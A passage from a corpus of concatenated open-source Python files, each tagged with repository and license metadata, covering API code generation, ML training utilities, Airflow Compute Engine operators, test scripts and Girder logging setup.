if http_method not in ['DELETE', 'GET', 'OPTIONS', 'PATCH', 'POST', 'PUT',
'PROPFIND', 'PROPPATCH', 'REPORT']:
raise ApiException('Unknown HTTP method: %s' % http_method, def_dict)
if http_method == 'GET':
self.SetTemplateValue('requestType', None)
# Replace parameters dict with Parameters. We try to order them by their
# position in the request path so that the generated code can track the
# more human readable definition, rather than the order of the parameters
# in the discovery doc.
order = self.values.get('parameterOrder', [])
req_parameters = []
opt_parameters = []
for name, def_dict in self.values.get('parameters', {}).iteritems():
param = Parameter(api, name, def_dict, self)
if name == 'alt':
# Treat the alt parameter differently
self.SetTemplateValue('alt', param)
continue
# Standard params are part of the generic request class
# We want to push all parameters that aren't declared inside
# parameterOrder after those that are.
if param.values['wireName'] in order:
req_parameters.append(param)
else:
# optional parameters are appended in the order they're declared.
opt_parameters.append(param)
# pylint: disable=g-long-lambda
req_parameters.sort(lambda x, y: cmp(order.index(x.values['wireName']),
order.index(y.values['wireName'])))
# sort optional parameters by name to avoid code churn
opt_parameters.sort(lambda x, y: cmp(x.values['wireName'], y.values['wireName']))
req_parameters.extend(opt_parameters)
self.SetTemplateValue('parameters', req_parameters)
self._InitMediaUpload(parent)
self._InitPageable(api)
api.AddMethod(self)
def _InitMediaUpload(self, parent):
media_upload = self.values.get('mediaUpload')
if media_upload:
if parent:
parent.SetTemplateValue('isMedia', True)
# Get which MIME Media Ranges are accepted for media uploads to this
# method.
accepted_mime_ranges = media_upload.get('accept')
self.SetTemplateValue('accepted_mime_ranges', accepted_mime_ranges)
max_size = media_upload.get('maxSize')
self.SetTemplateValue('max_size', max_size)
self.SetTemplateValue('max_size_bytes',
convert_size.ConvertSize(max_size))
# Find which upload protocols are supported.
upload_protocols = media_upload['protocols']
for upload_protocol in upload_protocols:
self._SetUploadTemplateValues(
upload_protocol, upload_protocols[upload_protocol])
def _InitPageable(self, api):
response_type = self.values.get('responseType')
if response_type == api.void_type:
return
next_page_token_name = self.FindPageToken(
response_type.values.get('properties'))
if not next_page_token_name:
return
is_page_token_parameter = True
page_token_name = self.FindPageToken(self.optional_parameters)
if not page_token_name:
# page token may be field of request body instead of query parameter
is_page_token_parameter = False
request_type = self.values.get('requestType')
if request_type:
page_token_name = self.FindPageToken(
request_type.values.get('properties'))
if not page_token_name:
return
self.SetTemplateValue('isPageable', True)
self.SetTemplateValue('isPagingStyleStandard',
(is_page_token_parameter and
page_token_name == 'pageToken' and
next_page_token_name == 'nextPageToken'))
def _SetUploadTemplateValues(self, upload_protocol, protocol_dict):
"""Sets upload specific template values.
Args:
upload_protocol: (str) The name of the upload protocol. Eg: 'simple' or
'resumable'.
protocol_dict: (dict) The dictionary that corresponds to this upload
protocol. It typically contains keys like 'path', 'multipart' etc.
"""
self.SetTemplateValue('%s_upload_supported' % upload_protocol, True)
upload_path = protocol_dict.get('path')
if upload_path:
self.SetTemplateValue('%s_upload_path' % upload_protocol, upload_path)
self.SetTemplateValue('%s_upload_multipart' % upload_protocol,
protocol_dict.get('multipart', False))
@property
def media_upload_parameters(self):
return self.values.get('mediaUpload')
@property
def parameters(self):
return self.values['parameters']
@property
def optional_parameters(self):
return [p for p in self.values['parameters'] if not p.required]
@property
def required_parameters(self):
return [p for p in self.values['parameters'] if p.required]
@property
def path_parameters(self):
return [p for p in self.values['parameters'] if p.location == 'path']
@property
def query_parameters(self):
return [p for p in self.values['parameters'] if p.location == 'query']
@staticmethod
def FindCodeObjectWithWireName(things, wire_name):
"""Looks for an element having the given wire_name.
Args:
things: (array of DataType) List of parameters or properties to search.
wire_name: (str) The wireName we are looking to find.
Returns:
None or element with the given wire_name.
"""
if not things: return None
for e in things:
if e.values['wireName'] == wire_name: return e
return None
@staticmethod
def FindPageToken(things):
"""Looks for an element with a wireName like a page token.
Args:
things: (array of DataType) List of parameters or properties to search.
Returns:
None or page token name found.
"""
for token_name in _PAGE_TOKEN_NAMES:
if Method.FindCodeObjectWithWireName(things, token_name):
return token_name
return None
#
# Expose some properties with the naming convention we use in templates
#
def optionalParameters(self): # pylint: disable=g-bad-name
return self.optional_parameters
def requiredParameters(self): # pylint: disable=g-bad-name
return self.required_parameters
def pathParameters(self): # pylint: disable=g-bad-name
return self.path_parameters
def queryParameters(self): # pylint: disable=g-bad-name
return self.query_parameters
class Parameter(template_objects.CodeObject):
"""The definition of a method parameter."""
def __init__(self, api, name, def_dict, method):
super(Parameter, self).__init__(def_dict, api, parent=method,
wire_name=name)
self.ValidateName(name)
self.schema = api
# TODO(user): Deal with dots in names better. What we should do is:
# For x.y, x.z create a little class X, with members y and z. Then
# have the constructor method take an X.
self._repeated = self.values.get('repeated', False)
self._required = self.values.get('required', False)
self._location = (self.values.get('location')
or self.values.get('restParameterType')
or 'query')
# TODO(user): Why not just use Schema.Create here?
referenced_schema = self.values.get('$ref')
if referenced_schema:
self._data_type = (api.SchemaByName(referenced_schema) or
data_types.SchemaReference(referenced_schema, api))
elif def_dict.get('type') == 'array':
self._data_type = Schema.Create(api, name, def_dict, name, method)
elif self.values.get('enum'):
self._data_type = data_types.Enum(def_dict,
api,
name,
self.values.get('enum'),
self.values.get('enumDescriptions'),
parent=method)
self.SetTemplateValue('enumType', self._data_type)
else:
self._data_type = data_types.PrimitiveDataType(def_dict, api, parent=self)
if self._repeated:
self._data_type = data_types.ArrayDataType(name, self._data_type,
parent=self)
@property
def repeated(self):
return self._repeated
@property
def required(self):
return self._required
@property
def location(self):
return self._location
@property
def code_type(self):
return self._data_type.code_type
@property
def data_type(self):
return self._data_type
| bshaffer/google-api-php-client-services | generator/src/googleapis/codegen/api.py | Python | apache-2.0 | 37,026 |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six import string_types
import random
import re
import json
import numpy as np
import traceback
from cognitive import stim_generator as sg
import cognitive.constants as const
_R_MEAN = 123.68
_G_MEAN = 116.78
_B_MEAN = 103.94
def convert_to_grid(xy_coord, prefs):
"""Given a x-y coordinate, return the target activity for a grid of neurons.
Args:
xy_coord : numpy 2-D array (batch_size, 2)
prefs: numpy 2-D array (n_out_pnt, 2). x and y preferences.
Returns:
activity: numpy array (batch_size, GRID_SIZE**2)
"""
sigma2 = 0.02 # 2*sigma-squared
activity = np.exp(-((xy_coord[:, 0:1] - prefs[:, 0])**2 +
(xy_coord[:, 1:2] - prefs[:, 1])**2) / sigma2)
activity = (activity.T / np.sum(activity, axis=1)).T
return activity
def map_sentence2ints(sentence):
"""Map a sentence to a list of words."""
word_list = re.findall(r"[\w']+|[.,!?;]", sentence)
int_list = [const.INPUTVOCABULARY.index(word) for word in word_list]
return np.array(int_list).astype(np.int32)
def preprocess(in_imgs_, vis_type):
"""Pre-process images."""
if (vis_type == 'vgg') or (vis_type == 'vgg_pretrain'):
in_imgs_ -= np.array([_R_MEAN, _G_MEAN, _B_MEAN], dtype=np.float32)
else:
in_imgs_ /= 255.
in_imgs_ -= np.mean(in_imgs_)
return in_imgs_
def tasks_to_rules(tasks):
"""Generate in_rule and seq_length arrays.
Args:
tasks: a list of tg.Task instances or string rules, length is batch_size.
"""
batch_size = len(tasks)
in_rule = np.zeros((const.MAXSEQLENGTH, batch_size), dtype=np.int64)
seq_length = np.zeros((batch_size,), dtype=np.int64)
for i_task, task in enumerate(tasks):
word_list = re.findall(r"[\w']+|[.,!?;]", str(task))
seq_length[i_task] = len(word_list)
for i_word, word in enumerate(word_list):
in_rule[i_word, i_task] = const.INPUTVOCABULARY.index(word)
return in_rule, seq_length
def set_outputs_from_tasks(n_epoch, tasks, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word):
j = 0
for epoch_now in range(n_epoch):
for task, objset in zip(tasks, objsets):
target = task(objset, epoch_now)
if target is const.INVALID:
# For invalid target, no loss is used. Everything remains zero.
pass
elif isinstance(target, sg.Loc):
# minimize point loss
out_pnt_xy[j, :] = target.value
mask_pnt[j] = 1.
elif isinstance(target, bool) or isinstance(target, sg.Attribute):
if isinstance(target, bool):
target = 'true' if target else 'false'
else:
target = target.value
# For boolean target, only minimize word loss
out_word[j] = const.OUTPUTVOCABULARY.index(target)
mask_word[j] = 1.
else:
raise TypeError('Unknown target type.')
j += 1
def set_outputs_from_targets(n_epoch, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word):
j = 0
for epoch_now in range(n_epoch):
for objset in objsets:
target = objset.targets[epoch_now]
if target == 'invalid':
# For invalid target, no loss is used. Everything remains zero.
pass
elif isinstance(target, (list, tuple)):
assert len(target) == 2, "Expected 2-D target. Got " + str(target)
# minimize point loss
out_pnt_xy[j, :] = target
mask_pnt[j] = 1.
elif isinstance(target, string_types):
out_word[j] = const.OUTPUTVOCABULARY.index(target)
mask_word[j] = 1.
else:
raise TypeError('Unknown target type: %s %s' % (type(target), target))
j += 1
def generate_batch(tasks,
n_epoch=30,
img_size=224,
objsets=None,
n_distractor=1,
average_memory_span=2):
"""Generate a batch of trials.
Return numpy arrays to feed the tensorflow placeholders.
Args:
tasks: a list of tg.Task instances, length is batch_size.
n_epoch: int, number of epochs
img_size: int, image size
objsets: None or list of ObjectSet/StaticObjectSet instances
n_distractor: int, number of distractors to add
average_memory_span: int, the average number of epochs by which an object
need to be held in working memory, if needed at all
Returns:
All variables are numpy array of float32
in_imgs: (n_epoch*batch_size, img_size, img_size, 3)
in_rule: (max_seq_length, batch_size) the rule language input, type int32
seq_length: (batch_size,) the length of each task instruction
out_pnt: (n_epoch*batch_size, n_out_pnt)
out_pnt_xy: (n_epoch*batch_size, 2)
out_word: (n_epoch*batch_size, n_out_word)
mask_pnt: (n_epoch*batch_size)
mask_word: (n_epoch*batch_size)
Raises:
TypeError: when target type is incorrect.
"""
batch_size = len(tasks)
if objsets is None:
objsets = list()
for task in tasks:
objsets.append(
task.generate_objset(n_epoch,
n_distractor=n_distractor,
average_memory_span=average_memory_span))
max_objset_epoch = max([objset.n_epoch for objset in objsets])
assert max_objset_epoch == n_epoch, '%d != %d' % (max_objset_epoch, n_epoch)
in_imgs = sg.render(objsets, img_size)
# The rendered images are batch major
in_imgs = np.reshape(in_imgs, [batch_size, n_epoch, img_size, img_size, 3])
# Swap to time major
in_imgs = np.swapaxes(in_imgs, 0, 1)
# Outputs and masks
out_pnt_xy = np.zeros((n_epoch * batch_size, 2), dtype=np.float32)
out_word = np.zeros((n_epoch * batch_size), dtype=np.int64)
mask_pnt = np.zeros((n_epoch * batch_size), dtype=np.float32)
mask_word = np.zeros((n_epoch * batch_size), dtype=np.float32)
if isinstance(objsets[0], sg.StaticObjectSet):
set_outputs_from_targets(n_epoch, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word)
else:
set_outputs_from_tasks(n_epoch, tasks, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word)
# Process outputs
out_pnt = convert_to_grid(out_pnt_xy, const.PREFS)
# Generate rule inputs, padded to maximum number of words in a sentence
in_rule, seq_length = tasks_to_rules(tasks)
return (in_imgs, in_rule, seq_length, out_pnt, out_pnt_xy, out_word, mask_pnt,
mask_word)
def static_objsets_from_examples(examples):
"""Returns a list of StaticObjectSet objects.
Args:
examples: an iterable of dictionaries decoded from json examples.
"""
static_objsets = []
for e in examples:
static_objs = [o for multi_epoch_obj in e['objects']
for o in sg.static_objects_from_dict(multi_epoch_obj)]
static_objset = sg.StaticObjectSet(n_epoch=e['epochs'],
static_objects=static_objs,
targets=e['answers'])
static_objsets.append(static_objset)
return static_objsets
def json_to_feeds(json_examples):
if isinstance(json_examples, string_types):
json_examples = [json_examples]
examples = []
families = []
rules = []
for je in json_examples:
try:
e = json.loads(je)
except (ValueError, TypeError):
traceback.print_exc()
raise
rules.append(e['question'])
examples.append(e)
families.append(e['family'])
epochs = examples[0]['epochs']
static_objsets = static_objsets_from_examples(examples)
values = generate_batch(rules, n_epoch=epochs,
img_size=112, objsets=static_objsets,
# not used when objsets are given
n_distractor=0,
# not used when objsets are given
average_memory_span=0)
values = values + (families,)
return values
def generate_feeds(tasks, hparams, dataparams=None):
"""Generate feed dict for placeholders.
Args:
tasks: a list of tg.Task instances, length is batch_size.
hparams: hyperparameters in tf.HParams format.
dataparams: dictionary of parameters for the dataset
Returns:
feed_dict: the tensorflow feed_dict dictionary
"""
if isinstance(hparams.n_epoch, int):
n_epoch = hparams.n_epoch
else:
n_epoch = random.randrange(hparams.n_epoch[0], hparams.n_epoch[1] + 1)
# in_imgs, in_rule, seq_length, out_pnt, out_pnt_xy, out_word, mask_pnt,
# mask_word
return generate_batch(
tasks,
n_epoch=n_epoch,
img_size=112,
n_distractor=dataparams['n_distractor'],
average_memory_span=dataparams['average_memory_span']
)
| google/cog | cognitive/train_utils.py | Python | apache-2.0 | 9,504 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Reach oracle element used for configuration."""
import dataclasses
from pyreach.gyms import reach_element
@dataclasses.dataclass(frozen=True)
class ReachOracle(reach_element.ReachElement):
"""A Reach Oracle configuration class.
Attributes:
reach_name: The name of the Oracle.
task_code: The task code string.
intent: The intention of the task. This agument is optional and defaults to
an empty string.
success_type: The type of success. This argument is optional and defaults
to an empty string.
is_synchronous: If True, the next Gym observation will synchronize all
observation elements that have this flag set otherwise the next
observation is asynchronous. This argument is optional and defaults to
False.
"""
task_code: str
intent: str = ""
success_type: str = ""
is_synchronous: bool = False
| google-research/pyreach | pyreach/gyms/oracle_element.py | Python | apache-2.0 | 1,448 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import apache_beam as beam
import logging
from typing import List, Dict, Any
from uploaders.google_ads.customer_match.abstract_uploader import GoogleAdsCustomerMatchAbstractUploaderDoFn
from uploaders import utils as utils
from models.execution import DestinationType, AccountConfig
from models.oauth_credentials import OAuthCredentials
class GoogleAdsCustomerMatchMobileUploaderDoFn(GoogleAdsCustomerMatchAbstractUploaderDoFn):
def get_list_definition(self, account_config: AccountConfig, destination_metadata: List[str]) -> Dict[str, Any]:
list_name = destination_metadata[0]
app_id = account_config.app_id
#overwrite app_id from default to custom
if len(destination_metadata) >=4 and len(destination_metadata[3]) > 0:
app_id = destination_metadata[3]
return {
'membership_status': 'OPEN',
'name': list_name,
'description': 'List created automatically by Megalista',
'membership_life_span': 10000,
'crm_based_user_list': {
'upload_key_type': 'MOBILE_ADVERTISING_ID', #CONTACT_INFO, CRM_ID, MOBILE_ADVERTISING_ID
'data_source_type': 'FIRST_PARTY',
'app_id': app_id
}
}
def get_row_keys(self) -> List[str]:
return ['mobile_id']
def get_action_type(self) -> DestinationType:
return DestinationType.ADS_CUSTOMER_MATCH_MOBILE_DEVICE_ID_UPLOAD
| google/megalista | megalista_dataflow/uploaders/google_ads/customer_match/mobile_uploader.py | Python | apache-2.0 | 1,938 |
import sys
sys.path.insert(1, "../../../")
import h2o
def link_functions_tweedie_basic(ip,port):
# Connect to h2o
h2o.init(ip,port)
print "Read in prostate data."
hdf = h2o.upload_file(h2o.locate("smalldata/prostate/prostate_complete.csv.zip"))
print "Testing for family: TWEEDIE"
print "Set variables for h2o."
y = "CAPSULE"
x = ["AGE","RACE","DCAPS","PSA","VOL","DPROS","GLEASON"]
print "Create models with canonical link: TWEEDIE"
model_h2o_tweedie = h2o.glm(x=hdf[x], y=hdf[y], family="tweedie", link="tweedie", alpha=[0.5], Lambda = [0])
print "Compare model deviances for link function tweedie (using precomputed values from R)"
deviance_h2o_tweedie = model_h2o_tweedie.residual_deviance() / model_h2o_tweedie.null_deviance()
assert 0.721452 - deviance_h2o_tweedie <= 0.01, "h2o's residual/null deviance is more than 0.01 lower than R's. h2o: " \
"{0}, r: {1}".format(deviance_h2o_tweedie, 0.721452)
if __name__ == "__main__":
h2o.run_test(sys.argv, link_functions_tweedie_basic)
| ChristosChristofidis/h2o-3 | h2o-py/tests/testdir_algos/glm/pyunit_link_functions_tweedie_basicGLM.py | Python | apache-2.0 | 1,103 |
__author__ = 'Autio'
from distutils.core import setup
import py2exe
setup(windows=['ShitCrimson.py'])
| ArchBang85/S_Crimson | Setup.py | Python | apache-2.0 | 104 |
def test_dummy_request():
from rasa.nlu.emulators.no_emulator import NoEmulator
em = NoEmulator()
norm = em.normalise_request_json({"text": ["arb text"]})
assert norm == {"text": "arb text", "time": None}
norm = em.normalise_request_json({"text": ["arb text"], "time": "1499279161658"})
assert norm == {"text": "arb text", "time": "1499279161658"}
def test_dummy_response():
from rasa.nlu.emulators.no_emulator import NoEmulator
em = NoEmulator()
data = {"intent": "greet", "text": "hi", "entities": {}, "confidence": 1.0}
assert em.normalise_response_json(data) == data
def test_emulators_can_handle_missing_data():
from rasa.nlu.emulators.luis import LUISEmulator
em = LUISEmulator()
norm = em.normalise_response_json(
{"text": "this data doesn't contain an intent result"}
)
assert norm["prediction"]["topIntent"] is None
assert norm["prediction"]["intents"] == {}
| RasaHQ/rasa_nlu | tests/nlu/emulators/test_no_emulator.py | Python | apache-2.0 | 948 |
#
# Copyright 2014-2015 Boundary, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import ApiCli
class SourceList(ApiCli):
def __init__(self):
ApiCli.__init__(self)
self.path = "v1/account/sources/"
self.method = "GET"
def getDescription(self):
return "Lists the sources in a Boundary account"
| wcainboundary/boundary-api-cli | boundary/source_list.py | Python | apache-2.0 | 856 |
# Задача 2. Вариант 8.
#Напишите программу, которая будет выводить на экран наиболее понравившееся вам высказывание, автором которого является Лао-Цзы. Не забудьте о том, что автор должен быть упомянут на отдельной строке.
# Ionova A. K.
#30.04.2016
print("Нельзя обожествлять бесов.\n\t\t\t\t\t\t\t\tЛао-цзы")
input("Нажмите ENTER для выхода.") | Mariaanisimova/pythonintask | INBa/2015/Ionova_A_K/task_2_8.py | Python | apache-2.0 | 579 |
from fruits import validate_fruit
fruits = ["banana", "lemon", "apple", "orange", "batman"]
print fruits
def list_fruits(fruits, byName=True):
if byName:
# WARNING: this won't make a copy of the list and return it. It will change the list FOREVER
fruits.sort()
for index, fruit in enumerate(fruits):
if validate_fruit(fruit):
print "Fruit nr %d is %s" % (index, fruit)
else:
print "This %s is no fruit!" % (fruit)
list_fruits(fruits)
print fruits
| Painatalman/python101 | sources/101_test.py | Python | apache-2.0 | 519 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow import AirflowException
from airflow.contrib.hooks.gcp_compute_hook import GceHook
from airflow.contrib.utils.gcp_field_validator import GcpBodyFieldValidator
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class GceBaseOperator(BaseOperator):
"""
Abstract base operator for Google Compute Engine operators to inherit from.
"""
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
gcp_conn_id='google_cloud_default',
api_version='v1',
*args, **kwargs):
self.project_id = project_id
self.zone = zone
self.full_location = 'projects/{}/zones/{}'.format(self.project_id,
self.zone)
self.resource_id = resource_id
self.gcp_conn_id = gcp_conn_id
self.api_version = api_version
self._validate_inputs()
self._hook = GceHook(gcp_conn_id=self.gcp_conn_id, api_version=self.api_version)
super(GceBaseOperator, self).__init__(*args, **kwargs)
def _validate_inputs(self):
if not self.project_id:
raise AirflowException("The required parameter 'project_id' is missing")
if not self.zone:
raise AirflowException("The required parameter 'zone' is missing")
if not self.resource_id:
raise AirflowException("The required parameter 'resource_id' is missing")
def execute(self, context):
pass
class GceInstanceStartOperator(GceBaseOperator):
"""
Start an instance in Google Compute Engine.
:param project_id: Google Cloud Platform project where the Compute Engine
instance exists.
:type project_id: str
:param zone: Google Cloud Platform zone where the instance exists.
:type zone: str
:param resource_id: Name of the Compute Engine instance resource.
:type resource_id: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
:param api_version: API version used (e.g. v1).
:type api_version: str
"""
template_fields = ('project_id', 'zone', 'resource_id', 'gcp_conn_id', 'api_version')
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
gcp_conn_id='google_cloud_default',
api_version='v1',
*args, **kwargs):
super(GceInstanceStartOperator, self).__init__(
project_id=project_id, zone=zone, resource_id=resource_id,
gcp_conn_id=gcp_conn_id, api_version=api_version, *args, **kwargs)
def execute(self, context):
return self._hook.start_instance(self.project_id, self.zone, self.resource_id)
class GceInstanceStopOperator(GceBaseOperator):
"""
Stop an instance in Google Compute Engine.
:param project_id: Google Cloud Platform project where the Compute Engine
instance exists.
:type project_id: str
:param zone: Google Cloud Platform zone where the instance exists.
:type zone: str
:param resource_id: Name of the Compute Engine instance resource.
:type resource_id: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
:param api_version: API version used (e.g. v1).
:type api_version: str
"""
template_fields = ('project_id', 'zone', 'resource_id', 'gcp_conn_id', 'api_version')
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
gcp_conn_id='google_cloud_default',
api_version='v1',
*args, **kwargs):
super(GceInstanceStopOperator, self).__init__(
project_id=project_id, zone=zone, resource_id=resource_id,
gcp_conn_id=gcp_conn_id, api_version=api_version, *args, **kwargs)
def execute(self, context):
return self._hook.stop_instance(self.project_id, self.zone, self.resource_id)
SET_MACHINE_TYPE_VALIDATION_SPECIFICATION = [
dict(name="machineType", regexp="^.+$"),
]
class GceSetMachineTypeOperator(GceBaseOperator):
"""
Changes the machine type for a stopped instance to the machine type specified in
the request.
:param project_id: Google Cloud Platform project where the Compute Engine
instance exists.
:type project_id: str
:param zone: Google Cloud Platform zone where the instance exists.
:type zone: str
:param resource_id: Name of the Compute Engine instance resource.
:type resource_id: str
:param body: Body required by the Compute Engine setMachineType API, as described in
https://cloud.google.com/compute/docs/reference/rest/v1/instances/setMachineType#request-body
:type body: dict
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
:param api_version: API version used (e.g. v1).
:type api_version: str
"""
template_fields = ('project_id', 'zone', 'resource_id', 'gcp_conn_id', 'api_version')
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
body,
gcp_conn_id='google_cloud_default',
api_version='v1',
validate_body=True,
*args, **kwargs):
self.body = body
self._field_validator = None
if validate_body:
self._field_validator = GcpBodyFieldValidator(
SET_MACHINE_TYPE_VALIDATION_SPECIFICATION, api_version=api_version)
super(GceSetMachineTypeOperator, self).__init__(
project_id=project_id, zone=zone, resource_id=resource_id,
gcp_conn_id=gcp_conn_id, api_version=api_version, *args, **kwargs)
def _validate_all_body_fields(self):
if self._field_validator:
self._field_validator.validate(self.body)
def execute(self, context):
self._validate_all_body_fields()
return self._hook.set_machine_type(self.project_id, self.zone,
self.resource_id, self.body)
| sid88in/incubator-airflow | airflow/contrib/operators/gcp_compute_operator.py | Python | apache-2.0 | 7,129 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import cherrypy
import functools
import logging
import logging.handlers
import os
import six
import sys
import traceback
from girder.constants import LOG_ROOT, MAX_LOG_SIZE, LOG_BACKUP_COUNT, TerminalColor, VERSION
from girder.utility import config, mkdir
from girder.utility._cache import cache, requestCache, rateLimitBuffer
__version__ = '2.5.0'
__license__ = 'Apache 2.0'
VERSION['apiVersion'] = __version__
_quiet = False
_originalStdOut = sys.stdout
_originalStdErr = sys.stderr
class LogLevelFilter(object):
"""
Filter log records based on whether they are between a min and max level.
"""
def __init__(self, min, max):
self.minLevel = min
self.maxLevel = max
def filter(self, logRecord):
level = logRecord.levelno
return self.maxLevel >= level >= self.minLevel
class LogFormatter(logging.Formatter):
"""
Custom formatter that adds useful information about the request to the logs
when an exception happens. Cherrypy access logs are passed through without
change.
"""
def formatException(self, exc):
info = '\n'.join((
' Request URL: %s %s' % (cherrypy.request.method.upper(),
cherrypy.url()),
' Query string: ' + cherrypy.request.query_string,
' Remote IP: ' + cherrypy.request.remote.ip
))
return ('%s\n'
'Additional info:\n'
'%s' % (logging.Formatter.formatException(self, exc), info))
def format(self, record, *args, **kwargs):
if hasattr(record, 'name') and hasattr(record, 'message'):
if (record.name.startswith('cherrypy.access') or
record.name.startswith('cherrypy.error')):
return record.message
return super(LogFormatter, self).format(record, *args, **kwargs)
class StreamToLogger(object):
"""
Redirect a file-like stream to a logger.
"""
def __init__(self, stream, logger, level):
self.stream = stream
self.logger = logger
self.level = level
self.logger._girderLogHandlerOutput = False
# This class is intended to override a default stream like sys.stdout
# and sys.stderr and send that information to both the original stream
# and the logger method. However, we want to preserve as much
# functionality for stdout and stderr as possible, so that other
# modules that send data to them can do so without a problem. The only
# method we really need to override is write, but we cannot mutate the
# write method on the stream itself, so we replace the stream with this
# custom class. To preserve the stream methods, all of them get added
# to our class instance except private and built-in methods, which, in
# python, begin with _.
# Fundamentally, this lets our stream replacement handle functions
# flush, writeline, and others without having to enumerate them
# individually.
for key in dir(stream):
# It's possible for a file-like object to have name appear in dir(stream) but not
# actually be an attribute, thus using a default with getattr is required.
# See https://github.com/GrahamDumpleton/mod_wsgi/issues/184 for more.
if (key != 'write' and not key.startswith('_') and (
callable(getattr(stream, key, None)) or
isinstance(getattr(stream, key, None), (
six.binary_type, six.string_types, six.integer_types, bool)))):
setattr(self, key, getattr(stream, key))
def write(self, buf):
if not self.logger._girderLogHandlerOutput:
self.logger._girderLogHandlerOutput = True
self.stream.write(buf)
for line in buf.rstrip().splitlines():
self.logger.log(self.level, line.rstrip())
self.logger._girderLogHandlerOutput = False
def getLogPaths():
"""
Return the paths to the error and info log files. These are returned as
a dict with "error" and "info" keys that point to the respective file,
as well as a "root" key pointing to the log root directory.
"""
cfg = config.getConfig()
logCfg = cfg.get('logging', {})
root = os.path.expanduser(logCfg.get('log_root', LOG_ROOT))
return {
'root': root,
'error': logCfg.get('error_log_file', os.path.join(root, 'error.log')),
'info': logCfg.get('info_log_file', os.path.join(root, 'info.log'))
}
def _setupLogger():
"""
Sets up the Girder logger.
"""
global _quiet
logger = logging.getLogger('girder')
cfg = config.getConfig()
logCfg = cfg.get('logging', {})
# If we are asked to be quiet, set a global flag so that logprint doesn't
# have to get the configuration settings every time it is used.
if logCfg.get('log_quiet') is True:
_quiet = True
logPaths = getLogPaths()
# Ensure log paths are valid
logDirs = [
logPaths['root'],
os.path.dirname(logPaths['info']),
os.path.dirname(logPaths['error'])
]
for logDir in logDirs:
mkdir(logDir)
# Set log level
level = logging.INFO
if logCfg.get('log_level') and isinstance(getattr(logging, logCfg['log_level'], None), int):
level = getattr(logging, logCfg['log_level'])
logger.setLevel(logging.DEBUG if level is None else level)
logSize = MAX_LOG_SIZE
if logCfg.get('log_max_size'):
sizeValue = logCfg['log_max_size']
sizeUnits = {'kb': 1024, 'Mb': 1024 ** 2, 'Gb': 1024 ** 3}
if sizeValue[-2:] in sizeUnits:
logSize = int(sizeValue[:-2].strip()) * sizeUnits[sizeValue[-2:]]
else:
logSize = int(sizeValue)
backupCount = int(logCfg.get('log_backup_count', LOG_BACKUP_COUNT))
# Remove extant log handlers (this allows this function to called multiple
# times)
for handler in list(logger.handlers):
if hasattr(handler, '_girderLogHandler'):
logger.removeHandler(handler)
cherrypy.log.access_log.removeHandler(handler)
fmt = LogFormatter('[%(asctime)s] %(levelname)s: %(message)s')
infoMaxLevel = logging.INFO
# Create log handlers
if logPaths['error'] != logPaths['info']:
eh = logging.handlers.RotatingFileHandler(
logPaths['error'], maxBytes=logSize, backupCount=backupCount)
eh.setLevel(level)
eh.addFilter(LogLevelFilter(min=logging.WARNING, max=logging.CRITICAL))
eh._girderLogHandler = 'error'
